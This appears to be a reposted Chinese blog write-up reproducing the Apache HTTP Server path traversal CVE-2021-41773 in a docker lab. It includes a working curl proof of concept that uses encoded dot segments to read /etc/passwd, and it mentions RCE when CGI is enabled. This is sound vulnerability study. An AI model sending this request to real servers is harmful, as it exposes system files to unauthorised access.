当前位置: 首页 > news >正文

Apache漏洞复现CVE-2021-41773

news 2025/7/14 9:01:38

Apache HTTP Server 路径穿越漏洞

漏洞简介

该漏洞是由于Apache HTTP Server 2.4.49版本存在目录穿越漏洞,在路径穿越目录 <Directory/>Require all granted</Directory>允许被访问的的情况下(默认开启),攻击者可利用该路径穿越漏洞读取到Web目录之外的其他文件

在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执行任意cgi命令(RCE)

影响版本

Apache HTTP Server 2.4.49
某些Apache HTTPd 2.4.50也存在此漏洞

环境搭建
docker pull blueteamsteve/cve-2021-41773:no-cgid
#启动容器
docker run -d -p 宿主机端口:容器端口 --name 容器名称 镜像的标识|镜像名称[:tag]
漏洞复现

http://ip:8080

image-20240806164423822

使用poc

curl http://ip:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

image-20240806164934680

http://www.lryc.cn/news/416672.html

相关文章:

  • GIT如何将远程指定分支的指定提交拉回到本地分支
  • 鸿蒙图形开发【3D引擎接口示例】
  • C#实现数据采集系统-系统优化服务封装
  • 数据结构与算法--栈、队列篇
  • 【程序、游戏、人生】致敬飞逝的3年和新的开始
  • 第三届人工智能、人机交互与机器人国际会议
  • AWS生成式AI项目的全生命周期管理
  • windows go grpc
  • Leetcode 第 135 场双周赛题解
  • rpc的原理
  • 【无线通信发展史-第二篇】,带你走进查利·奥古斯丁·库仑的世界,了解(库伦定律)-(扭秤实验)-(如何测量出静电力常量)
  • CAPL使用结构体的方式组装一条DoIP车辆声明消息(方法2)
  • 基于Matlab的车牌识别系统设计与实现
  • 使用Cisco进行模拟RIP路由协议配置
  • 段页式存储-系统架构师(三十七)
  • 通过指令深入了解Linux
  • IP探针双端源码
  • 高中数学学科知识与教学能力
  • Flink 实时数仓(七)【DWS 层搭建(一)流量域汇总表创建】
  • Python和PyCharm的安装激活及Python新手入门指南
  • Apache Flink窗口机制解析:滚动窗口与滑动窗口的比较与应用
  • 为什么《程序员修炼之道》评分能到 9.1?
  • 接口自动化测试框架中动态参数接口,加密接口,签名接口你们是怎么处理的?
  • 【hadoop】常用命令
  • 时间同步--- ntp与ptp
  • CSDN 僵尸粉 机器人
  • 【Material-UI】File Upload Button 组件详解
  • 计算机组成原理 - 中央处理器
  • C++笔试练习笔记【5】:最小花费爬楼梯(有题目链接) 初识动态规划
  • 数据结构----------贪心算法